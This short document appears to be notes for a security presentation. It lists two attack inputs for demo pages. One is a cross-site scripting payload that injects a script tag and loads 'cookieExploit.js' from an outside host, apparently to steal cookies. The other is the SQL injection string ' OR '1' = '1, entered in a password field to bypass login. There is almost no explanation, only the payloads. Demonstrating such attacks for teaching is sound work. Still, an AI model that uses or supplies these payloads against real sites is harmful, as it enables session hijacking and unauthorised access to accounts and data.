PART 1 - Cross Site Scripting:
====================================
http://caseyburkhardt.com/presentation/xss.php
Enter Text:

<script id="external_script" type="text/JavaScript"></script>
<script>
    document.getElementById('external_script').src = 'http://hacks.caseyburkhardt.com/cookieExploit.js';
</script>

PART 2 - SQL Injection:
====================================
http://hacks.caseyburkhardt.com/login.php
Enter Text in Password field:

FAKEPASSWORD' OR '1' = '1